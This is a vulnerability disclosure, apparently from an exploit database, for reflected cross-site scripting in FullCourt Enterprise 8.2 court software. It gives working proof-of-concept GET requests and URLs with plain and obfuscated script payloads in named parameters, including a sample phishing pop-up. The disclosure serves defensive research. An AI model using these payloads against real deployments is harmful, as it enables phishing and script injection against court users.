Headline
FullCourt Enterprise 8.2 Cross Site Scripting
FullCourt Enterprise version 8.2 suffers from multiple cross site scripting vulnerabilities.
Exploit Title: FullCourt enterprise XSS
Date: 2023-28-12
Exploit Author: Omar Sabagh
Author Linkedin: https://www.linkedin.com/in/omar-s-b937791a2/
Vendor Homepage: https://www.justicesystems.com
Software Link: https://www.justicesystems.com/products/fullcourt-enterprise/
Version: FullCourt enterprise - V8.2
CVE : CVE-2024-25327
Summary:
During a penetration test conducted in December of 2023, It was discovered that the full court enterprise web application was susceptible to reflected (obfuscated and unobfuscated) XSS attacks which could be injected in multiple parameters. This allows an attacker to redirect victims, create pop ups and load external resources (such as externally hosted images).
POC:
XSS example 1.)
GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000b9wsx%3cscript%3ealert(1)%3c%2fscript%3ec5yblw44633&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.criminalJuvenileCaseDomesticViolenceIndicator=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.juryVerdict=&courtCaseBean.citationImportCase=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1
–The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload b9wsx<script>alert(1)</script>c5yblw44633 was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application’s response.
–This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application’s response.
–The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
XSS example 2.)
GET /fullcourtweb/courtCase.do?courtCaseBean.currentDefendantID=&formatCaseType=&formatCaseYear=2023&formatCaseNumber=0000000vymvd%d3cscript%3ealert(1)%3c%2fscript%3erkoqwks4vtrfy0vi%3cscript%3ealert(1)%3c%2fscript%3egonoz&retrieveAction.x=0&retrieveAction.y=0&courtCaseBean.juryRequested=&courtCaseBean.batchLabelPrint=&courtCaseBean.physicalFile=&courtCaseBean.sealed=&=&doLabelSelect=false&printTrafficJacket=false&reportBean.reportMode=ledger&labelType=on HTTP/1.1
–The value of the formatCaseNumber request parameter is copied into the HTML document as plain text between tags. The payload fy0vi<script>alert(1)</script>gonoz was submitted in the formatCaseNumber parameter. This input was echoed unmodified in the application’s response.
XSS example 3.)
–Unobfuscated direct URL injection
https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C<script>alert(‘Bob–you owe 500 dollars,click here to resolve’)</script>%3Ex5zbiql8jrw&citationNumber=12345&searchAction=
–Obfuscated direct URL injection:
https://example-site.com/fullcourtweb/mvc/citationSearch?Index=1&r=qQDpfmw1%3C%73cr%69pt%3E%61ler%74(%27%4F%77ned%20%62y%20%4Fm%61r%27)%3C%2f%73cr%69pt%3Ex5zbiql8jrw&citationNumber=53267&searchAction=
–For both examples, The value of the r request parameter is copied into the HTML document as plain text between tags. The payloads were submitted in the r parameter. This input was echoed unmodified in the application’s response.